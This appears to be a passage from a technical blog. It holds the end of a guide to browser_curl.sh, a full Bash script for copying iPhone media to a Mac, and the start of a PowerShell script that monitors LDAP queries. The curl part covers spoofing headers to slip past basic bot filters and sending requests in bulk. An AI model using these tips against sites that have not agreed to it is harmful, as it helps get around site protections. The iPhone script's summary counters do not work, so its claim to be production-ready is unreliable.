Cause: Shell quoting issue (unbalanced quotes)

Solution: Use simple, direct commands

# Good
./browser_curl.sh --async https://example.com

# Bad (unbalanced quotes)
echo "test && ./browser_curl.sh --async https://example.com && echo "done"

For chaining commands:

echo Start; ./browser_curl.sh --async https://example.com; echo Done

Issue: Verbose mode produces too much output

Cause: -v flag prints all curl diagnostics to stderr

Solution: Remove -v for production use:

# Debug mode
./browser_curl.sh -v https://example.com

# Production mode
./browser_curl.sh https://example.com

Issue: Cookie file warning on first run

Cause: First-time cookie file creation

Solution: The script pre-creates the cookie file automatically when it does not already exist. You can ignore any residual warnings.

Issue: 403 Forbidden errors

Cause: Site has stronger protections (JavaScript challenges, TLS fingerprinting)

Solution: Consider using real browser automation:

  • Playwright (Python/Node.js)
  • Selenium
  • Puppeteer

Or combine approaches (see the sketch after these steps):

  1. Use Playwright to initialize session and get cookies
  2. Export cookies to file
  3. Use browser_curl.sh -c cookies.txt for subsequent requests
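
A hedged sketch of step 2, assuming the Playwright session was saved as storage_state.json and jq is available; the column order follows the Netscape cookie-file format that curl reads:

# Convert Playwright storageState JSON into a curl-compatible cookie jar
echo "# Netscape HTTP Cookie File" > cookies.txt
jq -r '.cookies[] | [ .domain,
        (if (.domain | startswith(".")) then "TRUE" else "FALSE" end),
        .path,
        (if .secure then "TRUE" else "FALSE" end),
        (if .expires < 0 then "0" else (.expires | floor | tostring) end),
        .name, .value ] | @tsv' storage_state.json >> cookies.txt

# Reuse the session with browser_curl
./browser_curl.sh -c cookies.txt https://example.com/dashboard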

Performance benchmarks

Tests conducted on 2023 MacBook Pro M2, macOS Sonoma:

  Test                             Time      Requests/sec
  Single sync request              ~0.2s     -
  10 async requests (--count)      ~0.03s    333/s
  100 async requests (--count)     ~0.09s    1111/s
  1000 async requests (--count)    ~0.8s     1250/s

Note: Dispatch time only; actual HTTP completion depends on target server.

Limitations

What this script CANNOT do

  • JavaScript execution – Can’t solve JS challenges (use Playwright)
  • CAPTCHA solving – Requires human intervention or services
  • Advanced TLS fingerprinting – Can’t mimic exact browser TLS stack
  • HTTP/2 fingerprinting – Can’t perfectly match browser HTTP/2 frames
  • WebSocket connections – HTTP only
  • Browser API access – No Canvas, WebGL, Web Crypto fingerprints

What this script CAN do

  • Basic header spoofing – Pass simple User-Agent checks
  • Cookie management – Maintain sessions
  • Load testing – Quick async request dispatch
  • API testing – POST/PUT/DELETE with JSON/form data
  • Simple scraping – Pages without JS requirements
  • Health checks – Monitoring endpoints

When to use what

Use browser_curl.sh when:

  • Target has basic bot detection (header checks)
  • API testing with authentication
  • Quick load testing (less than 10k requests)
  • Monitoring/health checks
  • No JavaScript required
  • You want a lightweight tool

Use Playwright/Selenium when:

  • Target requires JavaScript execution
  • CAPTCHA challenges present
  • Advanced fingerprinting detected
  • Need to interact with dynamic content
  • Heavy scraping with anti-bot measures
  • Login flows with MFA/2FA

Hybrid approach:

  1. Use Playwright to bootstrap session
  2. Extract cookies
  3. Use browser_curl.sh for follow-up requests (faster)

Advanced: Combining with other tools

With jq for JSON processing

./browser_curl.sh https://api.example.com/users | jq '.[] | .name'

With parallel for concurrency control

cat urls.txt | parallel -j 10 "./browser_curl.sh -o {#}.html {}"

With watch for monitoring

watch -n 5 "./browser_curl.sh https://api.example.com/health | jq .status"

With xargs for batch processing

cat ids.txt | xargs -I {} ./browser_curl.sh "https://api.example.com/item/{}"

Future enhancements

Potential features to add:

  • Rate limiting – Built-in requests/second throttling
  • Retry logic – Exponential backoff on failures
  • Output formats – JSON-only, CSV, headers-only modes
  • Proxy support – SOCKS5/HTTP proxy options
  • Custom TLS – Certificate pinning, client certs
  • Response validation – Assert status codes, content patterns
  • Metrics collection – Timing stats, success rates
  • Configuration file – Default settings per domain

Conclusion

browser_curl.sh provides a pragmatic middle ground between plain curl and full browser automation. For many APIs and websites with basic bot filters, browser-like headers, proper protocol use, and cookie handling are sufficient.

Key takeaways:

  • Simple wrapper around curl with realistic browser behavior
  • Async mode with --count for easy load testing
  • Works for basic bot detection, not advanced challenges
  • Combine with Playwright for tough targets
  • Lightweight and fast for everyday API work

The script is particularly useful for:

  • API development and testing
  • Quick load testing during development
  • Monitoring and health checks
  • Simple scraping tasks
  • Learning curl features

For production load testing at scale, consider tools like k6, Locust, or Artillery. For heavy web scraping with anti-bot measures, invest in proper browser automation infrastructure.


A Script to Download Photos and Videos from your iPhone to your MacBook (by creation date and a file name filter)

Annoyingly, Apple never quite got around to making it easy to offload photos and videos from your iPhone to your MacBook. Below is a complete guide to downloading them automatically, with options to filter by file pattern and date range, and to organize the results into folders by creation date.

Prerequisites

Install the required tools using Homebrew:

cat > install_iphone_util.sh << 'EOF'
#!/bin/bash
set -e

echo "Installing tools..."

echo "Installing macFUSE"
brew install --cask macfuse

echo "Adding Brew Tap" 
brew tap gromgit/fuse

echo "Installing ifuse-mac" 
brew install gromgit/fuse/ifuse-mac

echo "Installing libimobiledevice" 
brew install libimobiledevice

echo "Installing exiftool"
brew install exiftool

echo "Done! Tools installed."
EOF

echo "Making executable..."
chmod +x install_iphone_util.sh

./install_iphone_util.sh

Setup/Pair your iPhone to your Macbook

  1. Connect your iPhone to your MacBook via USB
  2. Trust the computer on your iPhone when prompted
  3. Verify the connection:
idevicepair validate

If not paired, run:

idevicepair pair
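
Once paired, you can sanity-check the mount before running the downloader (illustrative; /tmp/iphone_test is an arbitrary mount point):

mkdir -p /tmp/iphone_test
ifuse /tmp/iphone_test && ls /tmp/iphone_test/DCIM && umount /tmp/iphone_test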

Download Script

Run the script below to create the file download-iphone-media.sh in your current directory:

#!/bin/bash

cat > download-iphone-media.sh << 'OUTER_EOF'
#!/bin/bash

# iPhone Media Downloader
# Downloads photos and videos from iPhone to MacBook
# Supports resumable, idempotent downloads

set -e

# Default values
PATTERN="*"
OUTPUT_DIR="."
ORGANIZE_BY_DATE=false
START_DATE=""
END_DATE=""
MOUNT_POINT="/tmp/iphone_mount"
STATE_DIR=""
VERIFY_CHECKSUM=true

# Usage function
usage() {
    cat << 'INNER_EOF'
Usage: $0 [OPTIONS]

Download photos and videos from iPhone to MacBook.

OPTIONS:
    -p PATTERN          File pattern to match (e.g., "*.jpg", "*.mp4", "IMG_*")
                        Default: * (all files)
    -o OUTPUT_DIR       Output directory (default: current directory)
    -d                  Organize files by creation date into YYYY/MMM folders
    -s START_DATE       Start date filter (YYYY-MM-DD)
    -e END_DATE         End date filter (YYYY-MM-DD)
    -r                  Resume incomplete downloads (default: true)
    -n                  Skip checksum verification (faster, less safe)
    -h                  Show this help message

EXAMPLES:
    # Download all photos and videos to current directory
    $0

    # Download only JPG files to ~/Pictures/iPhone
    $0 -p "*.jpg" -o ~/Pictures/iPhone

    # Download all media organized by date
    $0 -d -o ~/Pictures/iPhone

    # Download videos from specific date range
    $0 -p "*.mov" -s 2025-01-01 -e 2025-01-31 -d -o ~/Videos/iPhone

    # Download specific IMG files organized by date
    $0 -p "IMG_*.{jpg,heic}" -d -o ~/Photos
INNER_EOF
    exit 1
}

# Parse command line arguments
while getopts "p:o:ds:e:rnh" opt; do
    case $opt in
        p) PATTERN="$OPTARG" ;;
        o) OUTPUT_DIR="$OPTARG" ;;
        d) ORGANIZE_BY_DATE=true ;;
        s) START_DATE="$OPTARG" ;;
        e) END_DATE="$OPTARG" ;;
        r) ;; # Resume is default, keeping for backward compatibility
        n) VERIFY_CHECKSUM=false ;;
        h) usage ;;
        *) usage ;;
    esac
done

# Create output directory if it doesn't exist
mkdir -p "$OUTPUT_DIR"
OUTPUT_DIR=$(cd "$OUTPUT_DIR" && pwd)

# Set up state directory for tracking downloads
STATE_DIR="$OUTPUT_DIR/.iphone_download_state"
mkdir -p "$STATE_DIR"

# Create mount point
mkdir -p "$MOUNT_POINT"

echo "=== iPhone Media Downloader ==="
echo "Pattern: $PATTERN"
echo "Output: $OUTPUT_DIR"
echo "Organize by date: $ORGANIZE_BY_DATE"
[ -n "$START_DATE" ] && echo "Start date: $START_DATE"
[ -n "$END_DATE" ] && echo "End date: $END_DATE"
echo ""

# Check if iPhone is connected
echo "Checking for iPhone connection..."
if ! ideviceinfo -s > /dev/null 2>&1; then
    echo "Error: No iPhone detected. Please connect your iPhone and trust this computer."
    exit 1
fi

# Mount iPhone
echo "Mounting iPhone..."
if ! ifuse "$MOUNT_POINT" 2>/dev/null; then
    echo "Error: Failed to mount iPhone. Make sure you've trusted this computer on your iPhone."
    exit 1
fi

# Cleanup function
cleanup() {
    local exit_code=$?
    echo ""
    if [ $exit_code -ne 0 ]; then
        echo "⚠ Download interrupted. Run the script again to resume."
    fi
    echo "Unmounting iPhone..."
    umount "$MOUNT_POINT" 2>/dev/null || true
    rmdir "$MOUNT_POINT" 2>/dev/null || true
}
trap cleanup EXIT

# Find DCIM folder
DCIM_PATH="$MOUNT_POINT/DCIM"
if [ ! -d "$DCIM_PATH" ]; then
    echo "Error: DCIM folder not found on iPhone"
    exit 1
fi

echo "Scanning for files matching pattern: $PATTERN"
echo ""

# Counter
TOTAL_FILES=0
COPIED_FILES=0
SKIPPED_FILES=0
RESUMED_FILES=0
FAILED_FILES=0

# Function to compute file checksum
compute_checksum() {
    local file="$1"
    if [ -f "$file" ]; then
        shasum -a 256 "$file" 2>/dev/null | awk '{print $1}'
    fi
}

# Function to get file size
get_file_size() {
    local file="$1"
    if [ -f "$file" ]; then
        stat -f "%z" "$file" 2>/dev/null
    fi
}

# Function to mark file as completed
mark_completed() {
    local source_file="$1"
    local dest_file="$2"
    local checksum="$3"
    local state_file="$STATE_DIR/$(echo "$source_file" | shasum -a 256 | awk '{print $1}')"
    
    echo "$dest_file|$checksum|$(date +%s)" > "$state_file"
}

# Function to check if file was previously completed
is_completed() {
    local source_file="$1"
    local dest_file="$2"
    local state_file="$STATE_DIR/$(echo "$source_file" | shasum -a 256 | awk '{print $1}')"
    
    if [ ! -f "$state_file" ]; then
        return 1
    fi
    
    # Read state file
    local saved_dest saved_checksum saved_timestamp
    IFS='|' read -r saved_dest saved_checksum saved_timestamp < "$state_file"
    
    # Check if destination file exists and matches
    if [ "$saved_dest" = "$dest_file" ] && [ -f "$dest_file" ]; then
        if [ "$VERIFY_CHECKSUM" = true ]; then
            local current_checksum=$(compute_checksum "$dest_file")
            if [ "$current_checksum" = "$saved_checksum" ]; then
                return 0
            fi
        else
            # Without checksum verification, just check file exists
            return 0
        fi
    fi
    
    return 1
}

# Convert dates to timestamps for comparison
START_TIMESTAMP=""
END_TIMESTAMP=""
if [ -n "$START_DATE" ]; then
    START_TIMESTAMP=$(date -j -f "%Y-%m-%d" "$START_DATE" "+%s" 2>/dev/null || echo "")
    if [ -z "$START_TIMESTAMP" ]; then
        echo "Error: Invalid start date format. Use YYYY-MM-DD"
        exit 1
    fi
fi
if [ -n "$END_DATE" ]; then
    END_TIMESTAMP=$(date -j -f "%Y-%m-%d" "$END_DATE" "+%s" 2>/dev/null || echo "")
    if [ -z "$END_TIMESTAMP" ]; then
        echo "Error: Invalid end date format. Use YYYY-MM-DD"
        exit 1
    fi
    # Add 24 hours to include the entire end date
    END_TIMESTAMP=$((END_TIMESTAMP + 86400))
fi

# Process files
find "$DCIM_PATH" -type f | while read -r file; do
    filename=$(basename "$file")
    
    # Check if filename matches pattern (basic glob matching)
    if [[ ! "$filename" == $PATTERN ]]; then
        continue
    fi
    
    TOTAL_FILES=$((TOTAL_FILES + 1))
    
    # Get file creation date
    if command -v exiftool > /dev/null 2>&1; then
        # Try to get date from EXIF data
        CREATE_DATE=$(exiftool -s3 -DateTimeOriginal -d "%Y-%m-%d %H:%M:%S" "$file" 2>/dev/null)
        if [ -z "$CREATE_DATE" ]; then
            # Fallback to file modification time
            CREATE_DATE=$(stat -f "%Sm" -t "%Y-%m-%d %H:%M:%S" "$file" 2>/dev/null)
        fi
    else
        # Use file modification time
        CREATE_DATE=$(stat -f "%Sm" -t "%Y-%m-%d %H:%M:%S" "$file" 2>/dev/null)
    fi
    
    # Extract date components
    if [ -n "$CREATE_DATE" ]; then
        FILE_DATE=$(echo "$CREATE_DATE" | cut -d' ' -f1)
        FILE_TIMESTAMP=$(date -j -f "%Y-%m-%d" "$FILE_DATE" "+%s" 2>/dev/null || echo "")
        
        # Check date filters
        if [ -n "$START_TIMESTAMP" ] && [ -n "$FILE_TIMESTAMP" ] && [ "$FILE_TIMESTAMP" -lt "$START_TIMESTAMP" ]; then
            SKIPPED_FILES=$((SKIPPED_FILES + 1))
            continue
        fi
        if [ -n "$END_TIMESTAMP" ] && [ -n "$FILE_TIMESTAMP" ] && [ "$FILE_TIMESTAMP" -ge "$END_TIMESTAMP" ]; then
            SKIPPED_FILES=$((SKIPPED_FILES + 1))
            continue
        fi
        
        # Determine output path with YYYY/MMM structure
        if [ "$ORGANIZE_BY_DATE" = true ]; then
            YEAR=$(echo "$FILE_DATE" | cut -d'-' -f1)
            MONTH_NUM=$(echo "$FILE_DATE" | cut -d'-' -f2)
            # Convert month number to 3-letter abbreviation
            case "$MONTH_NUM" in
                01) MONTH="Jan" ;;
                02) MONTH="Feb" ;;
                03) MONTH="Mar" ;;
                04) MONTH="Apr" ;;
                05) MONTH="May" ;;
                06) MONTH="Jun" ;;
                07) MONTH="Jul" ;;
                08) MONTH="Aug" ;;
                09) MONTH="Sep" ;;
                10) MONTH="Oct" ;;
                11) MONTH="Nov" ;;
                12) MONTH="Dec" ;;
                *) MONTH="Unknown" ;;
            esac
            DEST_DIR="$OUTPUT_DIR/$YEAR/$MONTH"
        else
            DEST_DIR="$OUTPUT_DIR"
        fi
    else
        DEST_DIR="$OUTPUT_DIR"
    fi
    
    # Create destination directory
    mkdir -p "$DEST_DIR"
    
    # Determine destination path
    DEST_PATH="$DEST_DIR/$filename"
    
    # Check if this file was previously completed successfully
    if is_completed "$file" "$DEST_PATH"; then
        echo "✓ Already downloaded: $filename"
        SKIPPED_FILES=$((SKIPPED_FILES + 1))
        continue
    fi
    
    # Check if file already exists with same content (for backward compatibility)
    if [ -f "$DEST_PATH" ]; then
        if cmp -s "$file" "$DEST_PATH"; then
            echo "✓ Already exists (identical): $filename"
            # Mark as completed for future runs
            SOURCE_CHECKSUM=$(compute_checksum "$DEST_PATH")
            mark_completed "$file" "$DEST_PATH" "$SOURCE_CHECKSUM"
            SKIPPED_FILES=$((SKIPPED_FILES + 1))
            continue
        else
            # Add timestamp to avoid overwriting different file
            BASE="${filename%.*}"
            EXT="${filename##*.}"
            DEST_PATH="$DEST_DIR/${BASE}_$(date +%s).$EXT"
        fi
    fi
    
    # Use temporary file for atomic copy
    TEMP_PATH="${DEST_PATH}.tmp.$$"
    
    # Copy to temporary file
    echo "⬇ Downloading: $filename → $DEST_PATH"
    if ! cp "$file" "$TEMP_PATH" 2>/dev/null; then
        echo "✗ Failed to copy: $filename"
        rm -f "$TEMP_PATH"
        FAILED_FILES=$((FAILED_FILES + 1))
        continue
    fi
    
    # Verify size matches (basic corruption check)
    SOURCE_SIZE=$(get_file_size "$file")
    TEMP_SIZE=$(get_file_size "$TEMP_PATH")
    
    if [ "$SOURCE_SIZE" != "$TEMP_SIZE" ]; then
        echo "✗ Size mismatch for $filename (source: $SOURCE_SIZE, copied: $TEMP_SIZE)"
        rm -f "$TEMP_PATH"
        FAILED_FILES=$((FAILED_FILES + 1))
        continue
    fi
    
    # Compute checksum for verification and tracking
    if [ "$VERIFY_CHECKSUM" = true ]; then
        SOURCE_CHECKSUM=$(compute_checksum "$TEMP_PATH")
    else
        SOURCE_CHECKSUM="skipped"
    fi
    
    # Preserve timestamps
    if [ -n "$CREATE_DATE" ]; then
        TOUCH_TS=$(date -j -f "%Y-%m-%d %H:%M:%S" "$CREATE_DATE" "+%Y%m%d%H%M.%S" 2>/dev/null)
        [ -n "$TOUCH_TS" ] && touch -t "$TOUCH_TS" "$TEMP_PATH" 2>/dev/null || true
    fi
    
    # Atomic move from temp to final destination
    if mv "$TEMP_PATH" "$DEST_PATH" 2>/dev/null; then
        echo "✓ Completed: $filename"
        # Mark as successfully completed
        mark_completed "$file" "$DEST_PATH" "$SOURCE_CHECKSUM"
        COPIED_FILES=$((COPIED_FILES + 1))
    else
        echo "✗ Failed to finalize: $filename"
        rm -f "$TEMP_PATH"
        FAILED_FILES=$((FAILED_FILES + 1))
    fi
done

echo ""
echo "=== Summary ==="
echo "Total files matching pattern: $TOTAL_FILES"
echo "Files downloaded: $COPIED_FILES"
echo "Files already present: $SKIPPED_FILES"
if [ $FAILED_FILES -gt 0 ]; then
    echo "Files failed: $FAILED_FILES"
    echo ""
    echo "⚠ Some files failed to download. Run the script again to retry."
    exit 1
fi
echo ""
echo "✓ Download complete! All files transferred successfully."
OUTER_EOF

echo "Making the script executable..."
chmod +x download-iphone-media.sh

echo "✓ Script created successfully: download-iphone-media.sh"

Usage Examples

Basic Usage

Download all photos and videos to the current directory:

./download-iphone-media.sh

Download with Date Organization

Organize files into folders by creation date (YYYY/MMM structure):

./download-iphone-media.sh -d -o ./Pictures

This creates a structure like:

./Pictures
├── 2024/
│   ├── Jan/
│   │   ├── IMG_1234.jpg
│   │   └── IMG_1235.heic
│   ├── Feb/
│   └── Dec/
├── 2025/
│   ├── Jan/
│   └── Nov/

Filter by File Pattern

Download only specific file types:

# Only JPG files
./download-iphone-media.sh -p "*.jpg" -o ~/Pictures/iPhone

# Only videos (MOV and MP4)
./download-iphone-media.sh -p "*.mov" -o ~/Videos/iPhone
./download-iphone-media.sh -p "*.mp4" -o ~/Videos/iPhone

# Files starting with IMG_
./download-iphone-media.sh -p "IMG_*" -o ~/Pictures

# HEIC photos (iPhone's default format)
./download-iphone-media.sh -p "*.heic" -o ~/Pictures/iPhone

Filter by Date Range

Download photos from a specific date range:

# Photos from January 2025
./download-iphone-media.sh -s 2025-01-01 -e 2025-01-31 -d -o ~/Pictures/January2025

# Photos from last week
./download-iphone-media.sh -s 2025-11-10 -e 2025-11-17 -o ~/Pictures/LastWeek

# Photos after a specific date
./download-iphone-media.sh -s 2025-11-01 -o ~/Pictures/Recent

Combined Filters

Combine multiple options for precise control:

# Download only videos from January 2025, organized by date
./download-iphone-media.sh -p "*.mov" -s 2025-01-01 -e 2025-01-31 -d -o ~/Videos/Vacation

# Download all HEIC photos from the last month, organized by date
./download-iphone-media.sh -p "*.heic" -s 2025-10-17 -e 2025-11-17 -d -o ~/Pictures/LastMonth

Features

Resumable & Idempotent Downloads

  • Crash recovery: Interrupted downloads can be resumed by running the script again
  • Atomic operations: Files are copied to temporary locations first, then moved atomically
  • State tracking: Maintains a hidden state directory (.iphone_download_state) to track completed files
  • Checksum verification: Uses SHA-256 checksums to verify file integrity (can be disabled with -n for speed)
  • No duplicates: Running the script multiple times won’t re-download existing files
  • Corruption detection: Validates file sizes and optionally checksums after copy

Date-Based Organization

  • Automatic folder structure: Creates YYYY/MMM folders based on photo creation date (e.g., 2025/Jan, 2025/Feb)
  • EXIF data support: Reads actual photo capture date from EXIF metadata when available
  • Fallback mechanism: Uses file modification time if EXIF data is unavailable
  • Fewer folders: Maximum 12 month folders per year instead of up to 365 day folders

Smart File Handling

  • Duplicate detection: Skips files that already exist with identical content
  • Conflict resolution: Adds timestamp suffix to filename if different file with same name exists
  • Timestamp preservation: Maintains original creation dates on copied files
  • Error tracking: Reports failed files and provides clear exit codes

Progress Feedback

  • Real-time progress updates showing each file being downloaded
  • Summary statistics at the end (total found, downloaded, skipped, failed)
  • Clear error messages for troubleshooting
  • Helpful resume instructions if interrupted

Common File Patterns

iPhone typically uses these file formats:

| Type | Extensions | Pattern Example |
| --- | --- | --- |
| Photos | .jpg, .heic | `*.jpg` or `*.heic` |
| Videos | .mov, .mp4 | `*.mov` or `*.mp4` |
| Screenshots | .png | `*.png` |
| Live Photos | .heic + .mov | `IMG_*.heic` + `IMG_*.mov` |
| All media | all of the above | `*` (default) |

Handling Interrupted Downloads

If a download is interrupted (disconnection, error, etc.), simply run the script again:

# Script was interrupted - just run it again
./download-iphone-media.sh -d -o ~/Pictures/iPhone

The script will:

  • Skip all successfully downloaded files
  • Retry any failed files
  • Continue from where it left off

Fast Mode (Skip Checksum Verification)

For faster transfers on reliable connections, disable checksum verification:

# Skip checksums for speed (still verifies file sizes)
./download-iphone-media.sh -n -d -o ~/Pictures/iPhone

Note: This is generally safe but won’t detect corruption as thoroughly.

Clean State and Re-download

If you want to force a re-download of all files:

# Remove state directory to start fresh
rm -rf ~/Pictures/iPhone/.iphone_download_state
./download-iphone-media.sh -d -o ~/Pictures/iPhone

Troubleshooting

iPhone Not Detected

Error: No iPhone detected. Please connect your iPhone and trust this computer.

Solution:

  1. Make sure your iPhone is connected via USB cable
  2. Unlock your iPhone
  3. Tap “Trust” when prompted on your iPhone
  4. Run idevicepair pair if you haven’t already

Failed to Mount iPhone

Error: Failed to mount iPhone

Solution:

  1. Try unplugging and reconnecting your iPhone
  2. Check if another process is using the iPhone:
     umount /tmp/iphone_mount 2>/dev/null
  3. Restart your iPhone and try again
  4. On macOS Ventura or later, check System Settings → Privacy & Security → Files and Folders

Permission Denied

Solution:
Make sure the script has executable permissions:

chmod +x download-iphone-media.sh

Missing Tools

Error: Commands not found

Solution:
Install the required tools:

brew install libimobiledevice ifuse exiftool

On newer macOS versions, you may need to install macFUSE:

brew install --cask macfuse

After installation, you may need to restart your Mac and allow the kernel extension in System Settings → Privacy & Security.

Tips and Best Practices

1. Regular Backups

Create a scheduled backup script:

#!/bin/bash
# Save as ~/bin/backup-iphone-photos.sh

DATE=$(date +%Y-%m-%d)
BACKUP_DIR=~/Pictures/iPhone-Backups/$DATE

./download-iphone-media.sh -d -o "$BACKUP_DIR"

echo "Backup completed to $BACKUP_DIR"

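To run the wrapper automatically, schedule it with cron (a launchd agent also works on macOS); a minimal crontab sketch, assuming the wrapper lives at ~/bin/backup-iphone-photos.sh and the log path is just an example:

# Add with: crontab -e
# Run the backup every day at 09:00, appending output to a log file
0 9 * * * $HOME/bin/backup-iphone-photos.sh >> $HOME/Library/Logs/iphone-backup.log 2>&1

Because cron starts in $HOME with a minimal environment, the wrapper should invoke download-iphone-media.sh by absolute path.
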
2. Incremental Downloads

The script is fully idempotent and tracks completed downloads, making it perfect for incremental backups:

# Run daily to get new photos - only new files will be downloaded
./download-iphone-media.sh -d -o ~/Pictures/iPhone

The script maintains state in .iphone_download_state/ within your output directory, ensuring:

  • Already downloaded files are skipped instantly (no re-copying)
  • Interrupted downloads can be resumed
  • File integrity is verified with checksums

3. Free Up iPhone Storage

After confirming successful download:

  1. Verify files are on your MacBook
  2. Check file counts match (see the count check below)
  3. Delete photos from iPhone via Photos app
  4. Empty “Recently Deleted” album

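For step 2, a quick sanity check on the Mac side (a sketch; compare the count against what the Photos app reports on the iPhone):

# Count downloaded media files (assumes the output directory used above)
find ~/Pictures/iPhone -type f \( -iname "*.heic" -o -iname "*.jpg" -o -iname "*.png" \
    -o -iname "*.mov" -o -iname "*.mp4" \) | wc -l
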
4. Convert HEIC to JPG (Optional)

If you need JPG files for compatibility:

# Install ImageMagick
brew install imagemagick

# Convert all HEIC files to JPG
find ~/Pictures/iPhone -name "*.heic" -exec sh -c 'magick "$0" "${0%.heic}.jpg"' {} \;

How Idempotent Recovery Works

The script implements several mechanisms to ensure safe, resumable downloads:

1. State Tracking

A hidden directory .iphone_download_state/ is created in your output directory. For each successfully downloaded file, a state file is created containing:

  • Destination file path
  • SHA-256 checksum (if verification enabled)
  • Completion timestamp

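The helpers called in the script (compute_checksum, mark_completed, is_completed) are defined earlier in the full script; below is a minimal sketch of how such helpers can work, assuming STATE_DIR points at the .iphone_download_state directory (the state-file layout here is an assumption of the sketch):

# Sketch only: one state file per source file, keyed by a hash of the source path
state_key() {
    echo -n "$1" | shasum -a 256 | cut -d' ' -f1
}

compute_checksum() {
    shasum -a 256 "$1" | cut -d' ' -f1
}

mark_completed() {
    local src="$1" dest="$2" checksum="$3"
    printf '%s\n%s\n%s\n' "$dest" "$checksum" "$(date +%s)" > "$STATE_DIR/$(state_key "$src")"
}

is_completed() {
    local src="$1" dest="$2"
    local state="$STATE_DIR/$(state_key "$src")"
    [ -f "$state" ] || return 1                      # no completion record
    [ -f "$dest" ] || return 1                       # destination file is gone
    local stored
    stored=$(sed -n '2p' "$state")                   # second line = stored checksum
    [ "$stored" = "skipped" ] && return 0            # checksums were disabled (-n)
    [ "$stored" = "$(compute_checksum "$dest")" ]    # re-verify integrity
}
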
2. Atomic Operations

Each file is downloaded using a two-phase commit:

  1. Download Phase: Copy to temporary file (.tmp.$$ suffix)
  2. Verification Phase: Check file size and optionally compute checksum
  3. Commit Phase: Atomically move temp file to final destination
  4. Record Phase: Write completion state

If the script is interrupted at any point, incomplete temporary files are cleaned up automatically.

3. Idempotent Behavior

When you run the script:

  1. Before downloading each file, it checks the state directory
  2. If a state file exists, it verifies the destination file still exists and matches the checksum
  3. If verification passes, the file is skipped (no re-download)
  4. If verification fails or no state exists, the file is downloaded

This means:

  • ✓ Safe to run multiple times
  • ✓ Interrupted downloads can be resumed
  • ✓ Corrupted files are detected and re-downloaded
  • ✓ No wasted bandwidth on already-downloaded files

4. Checksum Verification

By default, SHA-256 checksums are computed and verified:

  • During download: Checksum computed after copy completes
  • On resume: Existing files are verified against stored checksum
  • Optional: Use -n flag to skip checksums for speed (still verifies file sizes)

Example Recovery Scenario

# Start downloading 1000 photos
./download-iphone-media.sh -d -o ~/Pictures/iPhone

# Script is interrupted after 500 files
# Press Ctrl+C or cable disconnects

# Simply run again - picks up where it left off
./download-iphone-media.sh -d -o ~/Pictures/iPhone
# Output:
# ✓ Already downloaded: IMG_0001.heic
# ✓ Already downloaded: IMG_0002.heic
# ...
# ⬇ Downloading: IMG_0501.heic → ~/Pictures/iPhone/2025/Jan/IMG_0501.heic

Performance Notes

  • Transfer speed: Depends on USB connection (USB 2.0 vs USB 3.0)
  • Large libraries: May take significant time for thousands of photos
  • EXIF reading: Adds minimal overhead but provides accurate dates
  • Pattern matching: Processed client-side, so all files are scanned

Conclusion

This script provides a robust, production-ready solution for downloading photos and videos from your iPhone to your MacBook. Key capabilities:

Core Features:

  • Filter by file patterns (type, name)
  • Filter by date ranges
  • Organize automatically into date-based folders
  • Preserve original file metadata

Reliability:

  • Fully idempotent – safe to run multiple times
  • Resumable downloads with automatic crash recovery
  • Atomic file operations prevent corruption
  • Checksum verification ensures data integrity
  • Clear error reporting and recovery instructions

For regular use, consider creating aliases in your ~/.zshrc:

# Add to ~/.zshrc
alias iphone-backup='~/download-iphone-media.sh -d -o ~/Pictures/iPhone'
alias iphone-videos='~/download-iphone-media.sh -p "*.mov" -d -o ~/Videos/iPhone'

Then simply run iphone-backup whenever you want to download your photos!

Windows Domain Controller: Monitor and Log LDAP operations/queries use of resources

The script below monitors LDAP activity on a Domain Controller and logs detailed information about queries whose server execution time exceeds a configurable threshold, including the client IP, the filter used, and the number of entries visited and returned. It helps identify problematic LDAP queries that may be impacting domain controller performance.

**Parameters:**

- `ThresholdSeconds` – Minimum query duration in seconds to log (default: 5)
- `LogPath` – Path where log files will be saved (default: `C:\LDAPDiagnostics`)
- `MonitorDuration` – How long to monitor in minutes (default: 0 = continuous)

**Example:**

```powershell
.\Diagnose-LDAPQueries.ps1 -ThresholdSeconds 3 -LogPath "C:\Logs\LDAP"
```

**The script:**

```powershell
[CmdletBinding()]
param(
    [int]$ThresholdSeconds = 5,
    [string]$LogPath = "C:\LDAPDiagnostics",
    [int]$MonitorDuration = 0  # 0 = continuous
)

# Requires Administrator privileges
#Requires -RunAsAdministrator

# Create log directory if it doesn't exist
if (-not (Test-Path $LogPath)) {
    New-Item -ItemType Directory -Path $LogPath -Force | Out-Null
}

$logFile = Join-Path $LogPath "LDAP_Diagnostics_$(Get-Date -Format 'yyyyMMdd_HHmmss').log"
$csvFile = Join-Path $LogPath "LDAP_Queries_$(Get-Date -Format 'yyyyMMdd_HHmmss').csv"

function Write-Log {
    param([string]$Message, [string]$Level = "INFO")
    $timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss"
    $logMessage = "[$timestamp] [$Level] $Message"
    Write-Host $logMessage
    Add-Content -Path $logFile -Value $logMessage
}

function Get-LDAPStatistics {
    try {
        # Query NTDS performance counters for LDAP statistics
        $ldapStats = @{
            ActiveThreads = (Get-Counter '\NTDS\LDAP Active Threads' -ErrorAction SilentlyContinue).CounterSamples.CookedValue
            SearchesPerSec = (Get-Counter '\NTDS\LDAP Searches/sec' -ErrorAction SilentlyContinue).CounterSamples.CookedValue
            ClientSessions = (Get-Counter '\NTDS\LDAP Client Sessions' -ErrorAction SilentlyContinue).CounterSamples.CookedValue
            BindTime = (Get-Counter '\NTDS\LDAP Bind Time' -ErrorAction SilentlyContinue).CounterSamples.CookedValue
        }
        return $ldapStats
    }
    catch {
        Write-Log "Error getting LDAP statistics: $_" "ERROR"
        return $null
    }
}

function Parse-LDAPEvent {
    param($Event)
    
    $eventData = @{
        TimeCreated = $Event.TimeCreated
        ClientIP = $null
        ClientPort = $null
        StartingNode = $null
        Filter = $null
        SearchScope = $null
        AttributeSelection = $null
        ServerControls = $null
        VisitedEntries = $null
        ReturnedEntries = $null
        TimeInServer = $null
    }

    # Parse event XML for detailed information
    try {
        $xml = [xml]$Event.ToXml()
        $dataNodes = $xml.Event.EventData.Data
        
        foreach ($node in $dataNodes) {
            switch ($node.Name) {
                "Client" { $eventData.ClientIP = ($node.'#text' -split ':')[0] }
                "StartingNode" { $eventData.StartingNode = $node.'#text' }
                "Filter" { $eventData.Filter = $node.'#text' }
                "SearchScope" { $eventData.SearchScope = $node.'#text' }
                "AttributeSelection" { $eventData.AttributeSelection = $node.'#text' }
                "ServerControls" { $eventData.ServerControls = $node.'#text' }
                "VisitedEntries" { $eventData.VisitedEntries = $node.'#text' }
